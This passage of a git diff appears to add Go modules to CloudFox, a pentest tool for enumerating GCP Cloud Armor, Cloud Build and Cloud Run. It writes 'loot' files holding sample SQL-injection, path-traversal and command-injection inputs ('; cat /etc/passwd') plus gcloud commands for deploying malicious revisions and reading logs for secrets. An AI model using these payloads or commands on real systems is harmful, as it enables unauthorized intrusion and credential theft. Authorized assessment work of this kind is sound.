+ } + + // Count policies with weaknesses + weakPolicies := 0 + for _, policy := range m.Policies { + if len(policy.Weaknesses) > 0 { + weakPolicies++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d security policy(ies), %d with weaknesses, %d unprotected LB(s)", + len(m.Policies), weakPolicies, totalUnprotected), globals.GCP_CLOUDARMOR_MODULE_NAME) + + if totalUnprotected > 0 { + logger.InfoM(fmt.Sprintf("[MEDIUM] %d load balancer(s) have no Cloud Armor protection", totalUnprotected), globals.GCP_CLOUDARMOR_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *CloudArmorModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Checking Cloud Armor in project: %s", projectID), globals.GCP_CLOUDARMOR_MODULE_NAME) + } + + svc := cloudarmorservice.New() + + // Get security policies + policies, err := svc.GetSecurityPolicies(projectID) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error getting policies for %s: %v", projectID, err), globals.GCP_CLOUDARMOR_MODULE_NAME) + } + } + + // Get unprotected LBs + unprotectedLBs, err := svc.GetUnprotectedLoadBalancers(projectID) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error getting unprotected LBs for %s: %v", projectID, err), globals.GCP_CLOUDARMOR_MODULE_NAME) + } + } + + m.mu.Lock() + m.Policies = append(m.Policies, policies...) + if len(unprotectedLBs) > 0 { + m.UnprotectedLBs[projectID] = unprotectedLBs + } + + for _, policy := range policies { + m.addPolicyToLoot(policy) + } + for _, lb := range unprotectedLBs { + m.addUnprotectedLBToLoot(projectID, lb) + } + m.mu.Unlock() +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *CloudArmorModule) initializeLootFiles() { + m.LootMap["security-policies"] = &internal.LootFile{ + Name: "security-policies", + Contents: "# Cloud Armor Security Policies\n# Generated by CloudFox\n\n", + } + m.LootMap["policy-weaknesses"] = &internal.LootFile{ + Name: "policy-weaknesses", + Contents: "# Cloud Armor Policy Weaknesses\n# Generated by CloudFox\n# These policies have misconfigurations that reduce their effectiveness\n\n", + } + m.LootMap["unprotected-lbs"] = &internal.LootFile{ + Name: "unprotected-lbs", + Contents: "# Load Balancers Without Cloud Armor Protection\n# Generated by CloudFox\n# These LBs have no WAF/DDoS protection\n\n", + } + m.LootMap["bypass-techniques"] = &internal.LootFile{ + Name: "bypass-techniques", + Contents: "# Cloud Armor Bypass Techniques\n# Generated by CloudFox\n# Based on policy analysis\n\n", + } +} + +func (m *CloudArmorModule) addPolicyToLoot(policy cloudarmorservice.SecurityPolicy) { + // All policies + m.LootMap["security-policies"].Contents += fmt.Sprintf( + "## [%s] %s\n"+ + "## Project: %s | Type: %s\n"+ + "## Rules: %d | Adaptive Protection: %v\n"+ + "## Attached Resources: %s\n", + policy.RiskLevel, policy.Name, + policy.ProjectID, policy.Type, + policy.RuleCount, policy.AdaptiveProtection, + strings.Join(policy.AttachedResources, ", "), + ) + for _, reason := range policy.RiskReasons { + m.LootMap["security-policies"].Contents += fmt.Sprintf("## + %s\n", reason) + } + for _, weakness := range policy.Weaknesses { + m.LootMap["security-policies"].Contents += fmt.Sprintf("## - WEAKNESS: %s\n", weakness) + } + m.LootMap["security-policies"].Contents += "\n" + + // Policies with weaknesses + if len(policy.Weaknesses) > 0 { + m.LootMap["policy-weaknesses"].Contents += fmt.Sprintf( + "## [%s] %s (Project: %s)\n", + policy.RiskLevel, policy.Name, policy.ProjectID, + ) + for _, weakness := range policy.Weaknesses { + m.LootMap["policy-weaknesses"].Contents += fmt.Sprintf("## - %s\n", weakness) + } + m.LootMap["policy-weaknesses"].Contents += "\n" + } + + // Generate bypass techniques based on weaknesses + if len(policy.Weaknesses) > 0 || len(policy.AttachedResources) > 0 { + m.LootMap["bypass-techniques"].Contents += fmt.Sprintf("## Policy: %s (Project: %s)\n", policy.Name, policy.ProjectID) + + // Check for missing OWASP rules + hasOWASP := false + for _, rule := range policy.Rules { + if strings.Contains(strings.ToLower(rule.Match), "sqli") || + strings.Contains(strings.ToLower(rule.Match), "xss") { + hasOWASP = true + break + } + } + + if !hasOWASP { + m.LootMap["bypass-techniques"].Contents += + "## No OWASP rules detected - try common web attacks:\n" + + "# SQLi: ' OR '1'='1\n" + + "# XSS: \n" + + "# Path traversal: ../../../etc/passwd\n" + + "# Command injection: ; cat /etc/passwd\n\n" + } + + // Check for preview-only rules + previewCount := 0 + for _, rule := range policy.Rules { + if rule.Preview { + previewCount++ + } + } + if previewCount > 0 { + m.LootMap["bypass-techniques"].Contents += fmt.Sprintf( + "## %d rules in preview mode - attacks will be logged but NOT blocked\n\n", + previewCount, + ) + } + + // Check for rate limiting + hasRateLimit := false + for _, rule := range policy.Rules { + if rule.RateLimitConfig != nil { + hasRateLimit = true + m.LootMap["bypass-techniques"].Contents += fmt.Sprintf( + "## Rate limit detected: %d requests per %d seconds\n", + rule.RateLimitConfig.ThresholdCount, + rule.RateLimitConfig.IntervalSec, + ) + } + } + if !hasRateLimit { + m.LootMap["bypass-techniques"].Contents += + "## No rate limiting - brute force attacks may succeed\n\n" + } + + m.LootMap["bypass-techniques"].Contents += "\n" + } +} + +func (m *CloudArmorModule) addUnprotectedLBToLoot(projectID, lbName string) { + m.LootMap["unprotected-lbs"].Contents += fmt.Sprintf( + "## [MEDIUM] %s (Project: %s)\n"+ + "## This load balancer has no Cloud Armor security policy\n"+ + "## It is vulnerable to:\n"+ + "## - DDoS attacks\n"+ + "## - Web application attacks (SQLi, XSS, etc.)\n"+ + "## - Bot attacks\n"+ + "##\n"+ + "## To add protection:\n"+ + "gcloud compute backend-services update %s \\\n"+ + " --project=%s \\\n"+ + " --security-policy=YOUR_POLICY_NAME\n\n", + lbName, projectID, + lbName, projectID, + ) +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *CloudArmorModule) writeOutput(ctx context.Context, logger internal.Logger) { + var tables []internal.TableFile + + // Security policies table + if len(m.Policies) > 0 { + header := []string{"Risk", "Policy", "Type", "Rules", "Adaptive", "Resources", "Weaknesses", "Project"} + var body [][]string + + for _, policy := range m.Policies { + adaptive := "No" + if policy.AdaptiveProtection { + adaptive = "Yes" + } + + resources := "-" + if len(policy.AttachedResources) > 0 { + resources = fmt.Sprintf("%d", len(policy.AttachedResources)) + } + + weaknessCount := "-" + if len(policy.Weaknesses) > 0 { + weaknessCount = fmt.Sprintf("%d", len(policy.Weaknesses)) + } + + body = append(body, []string{ + policy.RiskLevel, + policy.Name, + policy.Type, + fmt.Sprintf("%d", policy.RuleCount), + adaptive, + resources, + weaknessCount, + policy.ProjectID, + }) + } + + tables = append(tables, internal.TableFile{ + Name: "security-policies", + Header: header, + Body: body, + }) + } + + // Unprotected LBs table + var unprotectedList []struct { + ProjectID string + LBName string + } + for projectID, lbs := range m.UnprotectedLBs { + for _, lb := range lbs { + unprotectedList = append(unprotectedList, struct { + ProjectID string + LBName string + }{projectID, lb}) + } + } + + if len(unprotectedList) > 0 { + header := []string{"Risk", "Load Balancer", "Project", "Issue"} + var body [][]string + + for _, item := range unprotectedList { + body = append(body, []string{ + "MEDIUM", + item.LBName, + item.ProjectID, + "No Cloud Armor policy attached", + }) + } + + tables = append(tables, internal.TableFile{ + Name: "unprotected-load-balancers", + Header: header, + Body: body, + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + output := CloudArmorOutput{ + Table: tables, + Loot: lootFiles, + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + m.ProjectIDs, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_CLOUDARMOR_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/cloudbuild.go b/gcp/commands/cloudbuild.go new file mode 100644 index 00000000..82d145ce --- /dev/null +++ b/gcp/commands/cloudbuild.go @@ -0,0 +1,411 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + cloudbuildservice "github.com/BishopFox/cloudfox/gcp/services/cloudbuildService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPCloudBuildCommand = &cobra.Command{ + Use: globals.GCP_CLOUDBUILD_MODULE_NAME, + Aliases: []string{"cb", "build", "builds"}, + Short: "Enumerate Cloud Build triggers and builds", + Long: `Enumerate Cloud Build triggers and recent build executions. + +Features: +- Lists all build triggers +- Shows trigger source configuration (GitHub, CSR) +- Identifies service accounts used for builds +- Shows recent build executions +- Detects potentially risky trigger configurations`, + Run: runGCPCloudBuildCommand, +} + +// ------------------------------ +// Module Struct with embedded BaseGCPModule +// ------------------------------ +type CloudBuildModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields + Triggers []cloudbuildservice.TriggerInfo + Builds []cloudbuildservice.BuildInfo + SecurityAnalysis []cloudbuildservice.TriggerSecurityAnalysis + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct implementing CloudfoxOutput interface +// ------------------------------ +type CloudBuildOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o CloudBuildOutput) TableFiles() []internal.TableFile { return o.Table } +func (o CloudBuildOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPCloudBuildCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_CLOUDBUILD_MODULE_NAME) + if err != nil { + return + } + + module := &CloudBuildModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Triggers: []cloudbuildservice.TriggerInfo{}, + Builds: []cloudbuildservice.BuildInfo{}, + SecurityAnalysis: []cloudbuildservice.TriggerSecurityAnalysis{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *CloudBuildModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_CLOUDBUILD_MODULE_NAME, m.processProject) + + if len(m.Triggers) == 0 && len(m.Builds) == 0 { + logger.InfoM("No Cloud Build triggers or builds found", globals.GCP_CLOUDBUILD_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d trigger(s), %d recent build(s)", + len(m.Triggers), len(m.Builds)), globals.GCP_CLOUDBUILD_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *CloudBuildModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Cloud Build in project: %s", projectID), globals.GCP_CLOUDBUILD_MODULE_NAME) + } + + cbSvc := cloudbuildservice.New() + + // Get triggers + triggers, err := cbSvc.ListTriggers(projectID) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Could not list triggers: %v", err), globals.GCP_CLOUDBUILD_MODULE_NAME) + } + } + + // Get recent builds + builds, err := cbSvc.ListBuilds(projectID, 20) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Could not list builds: %v", err), globals.GCP_CLOUDBUILD_MODULE_NAME) + } + } + + m.mu.Lock() + m.Triggers = append(m.Triggers, triggers...) + m.Builds = append(m.Builds, builds...) + + for _, trigger := range triggers { + m.addTriggerToLoot(trigger) + // Perform security analysis + analysis := cbSvc.AnalyzeTriggerForPrivesc(trigger, projectID) + m.SecurityAnalysis = append(m.SecurityAnalysis, analysis) + m.addSecurityAnalysisToLoot(analysis) + } + + // Add build step analysis to loot + for _, build := range builds { + m.addBuildToLoot(build) + } + m.mu.Unlock() +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *CloudBuildModule) initializeLootFiles() { + m.LootMap["cloudbuild-triggers"] = &internal.LootFile{ + Name: "cloudbuild-triggers", + Contents: "# Cloud Build Triggers\n# Generated by CloudFox\n\n", + } + m.LootMap["cloudbuild-service-accounts"] = &internal.LootFile{ + Name: "cloudbuild-service-accounts", + Contents: "# Cloud Build Service Accounts\n# Generated by CloudFox\n\n", + } + // Pentest-focused loot files + m.LootMap["cloudbuild-privesc"] = &internal.LootFile{ + Name: "cloudbuild-privesc", + Contents: "# Cloud Build Privilege Escalation Opportunities\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap["cloudbuild-exploitation"] = &internal.LootFile{ + Name: "cloudbuild-exploitation", + Contents: "# Cloud Build Exploitation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap["cloudbuild-secrets"] = &internal.LootFile{ + Name: "cloudbuild-secrets", + Contents: "# Cloud Build Secret References\n# Generated by CloudFox\n# Secrets used in builds (names only, not values)\n\n", + } + m.LootMap["cloudbuild-logs"] = &internal.LootFile{ + Name: "cloudbuild-logs", + Contents: "# Cloud Build Log Locations\n# Generated by CloudFox\n# Check logs for leaked secrets\n\n", + } +} + +func (m *CloudBuildModule) addTriggerToLoot(trigger cloudbuildservice.TriggerInfo) { + m.LootMap["cloudbuild-triggers"].Contents += fmt.Sprintf( + "# Trigger: %s (%s)\n"+ + "# Source: %s - %s\n"+ + "# Branch: %s\n"+ + "# Config: %s\n\n", + trigger.Name, + trigger.ID, + trigger.SourceType, + trigger.RepoName, + trigger.BranchName, + trigger.Filename, + ) + + if trigger.ServiceAccount != "" { + m.LootMap["cloudbuild-service-accounts"].Contents += fmt.Sprintf( + "%s # Trigger: %s\n", + trigger.ServiceAccount, + trigger.Name, + ) + } +} + +func (m *CloudBuildModule) addSecurityAnalysisToLoot(analysis cloudbuildservice.TriggerSecurityAnalysis) { + if analysis.PrivescPotential || analysis.RiskLevel == "HIGH" || analysis.RiskLevel == "MEDIUM" { + m.LootMap["cloudbuild-privesc"].Contents += fmt.Sprintf( + "## [%s] Trigger: %s\n"+ + "## Project: %s\n"+ + "## Service Account: %s\n"+ + "## Privesc Potential: %v\n", + analysis.RiskLevel, analysis.TriggerName, + analysis.ProjectID, + analysis.ServiceAccount, + analysis.PrivescPotential, + ) + if len(analysis.RiskReasons) > 0 { + m.LootMap["cloudbuild-privesc"].Contents += "## Risk Reasons:\n" + for _, reason := range analysis.RiskReasons { + m.LootMap["cloudbuild-privesc"].Contents += fmt.Sprintf("## - %s\n", reason) + } + } + m.LootMap["cloudbuild-privesc"].Contents += "\n" + } + + // Exploitation commands + if len(analysis.ExploitCommands) > 0 { + m.LootMap["cloudbuild-exploitation"].Contents += fmt.Sprintf( + "## Trigger: %s (Project: %s)\n"+ + "## Risk: %s\n", + analysis.TriggerName, analysis.ProjectID, analysis.RiskLevel, + ) + for _, cmd := range analysis.ExploitCommands { + m.LootMap["cloudbuild-exploitation"].Contents += cmd + "\n" + } + m.LootMap["cloudbuild-exploitation"].Contents += "\n" + } +} + +func (m *CloudBuildModule) addBuildToLoot(build cloudbuildservice.BuildInfo) { + // Log locations for potential secret leakage + if build.LogsBucket != "" { + m.LootMap["cloudbuild-logs"].Contents += fmt.Sprintf( + "# Build: %s (Project: %s)\n"+ + "# Status: %s\n"+ + "gsutil cat %s/log-%s.txt\n\n", + build.ID[:12], build.ProjectID, build.Status, + build.LogsBucket, build.ID, + ) + } + + // Track secrets used in builds + if len(build.SecretEnvVars) > 0 { + m.LootMap["cloudbuild-secrets"].Contents += fmt.Sprintf( + "## Build: %s (Project: %s)\n"+ + "## Secret Environment Variables:\n", + build.ID[:12], build.ProjectID, + ) + for _, secret := range build.SecretEnvVars { + m.LootMap["cloudbuild-secrets"].Contents += fmt.Sprintf("## - %s\n", secret) + } + m.LootMap["cloudbuild-secrets"].Contents += "\n" + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *CloudBuildModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Triggers table + triggersHeader := []string{ + "Name", + "Source", + "Repository", + "Branch/Tag", + "Config File", + "Service Account", + "Disabled", + "Project", + } + + var triggersBody [][]string + for _, trigger := range m.Triggers { + disabled := "" + if trigger.Disabled { + disabled = "Yes" + } + + branchTag := trigger.BranchName + if branchTag == "" { + branchTag = trigger.TagName + } + + sa := trigger.ServiceAccount + if sa == "" { + sa = "(default)" + } + + triggersBody = append(triggersBody, []string{ + trigger.Name, + trigger.SourceType, + trigger.RepoName, + branchTag, + trigger.Filename, + sa, + disabled, + trigger.ProjectID, + }) + } + + // Builds table + buildsHeader := []string{ + "ID", + "Status", + "Trigger", + "Source", + "Created", + "Project", + } + + var buildsBody [][]string + for _, build := range m.Builds { + buildsBody = append(buildsBody, []string{ + build.ID[:12], + build.Status, + build.TriggerID, + build.Source, + build.CreateTime, + build.ProjectID, + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + tables := []internal.TableFile{ + { + Name: "cloudbuild-triggers", + Header: triggersHeader, + Body: triggersBody, + }, + } + + if len(buildsBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "cloudbuild-builds", + Header: buildsHeader, + Body: buildsBody, + }) + } + + // Security analysis table (pentest-focused) + securityHeader := []string{ + "Risk", + "Trigger", + "Service Account", + "Privesc", + "Reasons", + "Project", + } + + var securityBody [][]string + privescCount := 0 + for _, analysis := range m.SecurityAnalysis { + privesc := "" + if analysis.PrivescPotential { + privesc = "Yes" + privescCount++ + } + + reasons := strings.Join(analysis.RiskReasons, "; ") + if len(reasons) > 50 { + reasons = reasons[:50] + "..." + } + + securityBody = append(securityBody, []string{ + analysis.RiskLevel, + analysis.TriggerName, + analysis.ServiceAccount, + privesc, + reasons, + analysis.ProjectID, + }) + } + + if len(securityBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "cloudbuild-security", + Header: securityHeader, + Body: securityBody, + }) + if privescCount > 0 { + logger.InfoM(fmt.Sprintf("[PENTEST] Found %d trigger(s) with privilege escalation potential!", privescCount), globals.GCP_CLOUDBUILD_MODULE_NAME) + } + } + + output := CloudBuildOutput{ + Table: tables, + Loot: lootFiles, + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + m.ProjectIDs, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_CLOUDBUILD_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/cloudrun.go b/gcp/commands/cloudrun.go new file mode 100644 index 00000000..378a4e23 --- /dev/null +++ b/gcp/commands/cloudrun.go @@ -0,0 +1,503 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + CloudRunService "github.com/BishopFox/cloudfox/gcp/services/cloudrunService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPCloudRunCommand = &cobra.Command{ + Use: globals.GCP_CLOUDRUN_MODULE_NAME, + Aliases: []string{"run", "cr"}, + Short: "Enumerate Cloud Run services and jobs with security analysis", + Long: `Enumerate Cloud Run services and jobs across projects with security-relevant details. + +Features: +- Lists all Cloud Run services and jobs +- Shows security configuration (ingress, VPC, service account) +- Identifies publicly invokable services (allUsers/allAuthenticatedUsers) +- Shows container image, resources, and scaling configuration +- Counts environment variables and secret references +- Generates gcloud commands for further analysis + +Security Columns: +- Ingress: INGRESS_TRAFFIC_ALL (public), INTERNAL_ONLY, or INTERNAL_LOAD_BALANCER +- Public: Whether allUsers or allAuthenticatedUsers can invoke the service +- ServiceAccount: The identity the service runs as +- VPCAccess: Network connectivity to VPC resources +- Secrets: Count of secret environment variables and volumes + +Attack Surface: +- Public services with ALL ingress are internet-accessible +- Services with default service account may have excessive permissions +- VPC-connected services can access internal resources +- Container images may contain vulnerabilities or secrets`, + Run: runGCPCloudRunCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type CloudRunModule struct { + gcpinternal.BaseGCPModule + + Services []CloudRunService.ServiceInfo + Jobs []CloudRunService.JobInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type CloudRunOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o CloudRunOutput) TableFiles() []internal.TableFile { return o.Table } +func (o CloudRunOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPCloudRunCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_CLOUDRUN_MODULE_NAME) + if err != nil { + return + } + + module := &CloudRunModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Services: []CloudRunService.ServiceInfo{}, + Jobs: []CloudRunService.JobInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *CloudRunModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_CLOUDRUN_MODULE_NAME, m.processProject) + + totalResources := len(m.Services) + len(m.Jobs) + if totalResources == 0 { + logger.InfoM("No Cloud Run services or jobs found", globals.GCP_CLOUDRUN_MODULE_NAME) + return + } + + // Count public services + publicCount := 0 + for _, svc := range m.Services { + if svc.IsPublic { + publicCount++ + } + } + + if publicCount > 0 { + logger.SuccessM(fmt.Sprintf("Found %d service(s), %d job(s), %d public", len(m.Services), len(m.Jobs), publicCount), globals.GCP_CLOUDRUN_MODULE_NAME) + } else { + logger.SuccessM(fmt.Sprintf("Found %d service(s), %d job(s)", len(m.Services), len(m.Jobs)), globals.GCP_CLOUDRUN_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *CloudRunModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Cloud Run in project: %s", projectID), globals.GCP_CLOUDRUN_MODULE_NAME) + } + + cs := CloudRunService.New() + + // Get services + services, err := cs.Services(projectID) + if err != nil { + m.CommandCounter.Error++ + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error enumerating Cloud Run services in project %s: %v", projectID, err), globals.GCP_CLOUDRUN_MODULE_NAME) + } + } else { + m.mu.Lock() + m.Services = append(m.Services, services...) + for _, svc := range services { + m.addServiceToLoot(svc) + } + m.mu.Unlock() + } + + // Get jobs + jobs, err := cs.Jobs(projectID) + if err != nil { + m.CommandCounter.Error++ + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error enumerating Cloud Run jobs in project %s: %v", projectID, err), globals.GCP_CLOUDRUN_MODULE_NAME) + } + } else { + m.mu.Lock() + m.Jobs = append(m.Jobs, jobs...) + for _, job := range jobs { + m.addJobToLoot(job) + } + m.mu.Unlock() + } + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d service(s), %d job(s) in project %s", len(services), len(jobs), projectID), globals.GCP_CLOUDRUN_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *CloudRunModule) initializeLootFiles() { + m.LootMap["cloudrun-gcloud-commands"] = &internal.LootFile{ + Name: "cloudrun-gcloud-commands", + Contents: "# Cloud Run gcloud Commands\n# Generated by CloudFox\n\n", + } + m.LootMap["cloudrun-public-urls"] = &internal.LootFile{ + Name: "cloudrun-public-urls", + Contents: "# PUBLIC Cloud Run Service URLs\n# Generated by CloudFox\n# These services are publicly accessible!\n\n", + } + m.LootMap["cloudrun-exploitation"] = &internal.LootFile{ + Name: "cloudrun-exploitation", + Contents: "# Cloud Run Exploitation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap["cloudrun-images"] = &internal.LootFile{ + Name: "cloudrun-images", + Contents: "# Cloud Run Container Images\n# Generated by CloudFox\n# Check these for vulnerabilities and secrets\n\n", + } +} + +func (m *CloudRunModule) addServiceToLoot(svc CloudRunService.ServiceInfo) { + // gcloud commands + m.LootMap["cloudrun-gcloud-commands"].Contents += fmt.Sprintf( + "# Service: %s (Project: %s, Region: %s)\n"+ + "gcloud run services describe %s --region=%s --project=%s\n"+ + "gcloud run services get-iam-policy %s --region=%s --project=%s\n"+ + "gcloud run revisions list --service=%s --region=%s --project=%s\n\n", + svc.Name, svc.ProjectID, svc.Region, + svc.Name, svc.Region, svc.ProjectID, + svc.Name, svc.Region, svc.ProjectID, + svc.Name, svc.Region, svc.ProjectID, + ) + + // Container images + m.LootMap["cloudrun-images"].Contents += fmt.Sprintf( + "%s # %s (%s)\n", + svc.ContainerImage, svc.Name, svc.ProjectID, + ) + + // Public services + if svc.IsPublic && svc.URL != "" { + m.LootMap["cloudrun-public-urls"].Contents += fmt.Sprintf( + "# SERVICE: %s\n"+ + "# Project: %s, Region: %s\n"+ + "# Ingress: %s\n"+ + "# Service Account: %s\n"+ + "# URL:\n%s\n\n"+ + "# Test with:\ncurl -s %s\n\n", + svc.Name, + svc.ProjectID, svc.Region, + svc.IngressSettings, + svc.ServiceAccount, + svc.URL, + svc.URL, + ) + } + + // Exploitation commands + m.LootMap["cloudrun-exploitation"].Contents += fmt.Sprintf( + "# Service: %s (Project: %s, Region: %s)\n"+ + "# Service Account: %s\n"+ + "# Public: %v\n\n"+ + "# Invoke the service (if you have run.routes.invoke):\n"+ + "curl -H \"Authorization: Bearer $(gcloud auth print-identity-token)\" %s\n\n"+ + "# Deploy malicious revision (if you have run.services.update):\n"+ + "gcloud run deploy %s --image=YOUR_IMAGE --region=%s --project=%s\n\n"+ + "# Read container logs (if you have logging.logEntries.list):\n"+ + "gcloud logging read 'resource.type=\"cloud_run_revision\" resource.labels.service_name=\"%s\"' --project=%s --limit=50\n\n", + svc.Name, svc.ProjectID, svc.Region, + svc.ServiceAccount, + svc.IsPublic, + svc.URL, + svc.Name, svc.Region, svc.ProjectID, + svc.Name, svc.ProjectID, + ) +} + +func (m *CloudRunModule) addJobToLoot(job CloudRunService.JobInfo) { + // gcloud commands + m.LootMap["cloudrun-gcloud-commands"].Contents += fmt.Sprintf( + "# Job: %s (Project: %s, Region: %s)\n"+ + "gcloud run jobs describe %s --region=%s --project=%s\n"+ + "gcloud run jobs executions list --job=%s --region=%s --project=%s\n\n", + job.Name, job.ProjectID, job.Region, + job.Name, job.Region, job.ProjectID, + job.Name, job.Region, job.ProjectID, + ) + + // Container images + m.LootMap["cloudrun-images"].Contents += fmt.Sprintf( + "%s # job: %s (%s)\n", + job.ContainerImage, job.Name, job.ProjectID, + ) + + // Exploitation commands + m.LootMap["cloudrun-exploitation"].Contents += fmt.Sprintf( + "# Job: %s (Project: %s, Region: %s)\n"+ + "# Service Account: %s\n\n"+ + "# Execute the job (if you have run.jobs.run):\n"+ + "gcloud run jobs execute %s --region=%s --project=%s\n\n"+ + "# Update job image (if you have run.jobs.update):\n"+ + "gcloud run jobs update %s --image=YOUR_IMAGE --region=%s --project=%s\n\n", + job.Name, job.ProjectID, job.Region, + job.ServiceAccount, + job.Name, job.Region, job.ProjectID, + job.Name, job.Region, job.ProjectID, + ) +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *CloudRunModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Services table + servicesHeader := []string{ + "Project ID", + "Name", + "Region", + "URL", + "Ingress", + "Public", + "Service Account", + "Image", + "VPC Access", + "Min/Max Instances", + "Secrets", + } + + var servicesBody [][]string + for _, svc := range m.Services { + // Format public status + publicStatus := "No" + if svc.IsPublic { + publicStatus = "YES" + } + + // Format VPC access + vpcAccess := "-" + if svc.VPCAccess != "" { + vpcAccess = extractName(svc.VPCAccess) + if svc.VPCEgressSettings != "" { + vpcAccess += fmt.Sprintf(" (%s)", strings.TrimPrefix(svc.VPCEgressSettings, "VPC_EGRESS_")) + } + } + + // Format scaling + scaling := fmt.Sprintf("%d/%d", svc.MinInstances, svc.MaxInstances) + + // Format secrets count + secretCount := svc.SecretEnvVarCount + svc.SecretVolumeCount + secrets := "-" + if secretCount > 0 { + secrets = fmt.Sprintf("%d", secretCount) + } + + // Format image (truncate registry prefix for readability) + image := truncateImage(svc.ContainerImage) + + // Format service account (truncate for readability) + saDisplay := truncateSA(svc.ServiceAccount) + + servicesBody = append(servicesBody, []string{ + svc.ProjectID, + svc.Name, + svc.Region, + svc.URL, + formatIngress(svc.IngressSettings), + publicStatus, + saDisplay, + image, + vpcAccess, + scaling, + secrets, + }) + } + + // Jobs table + jobsHeader := 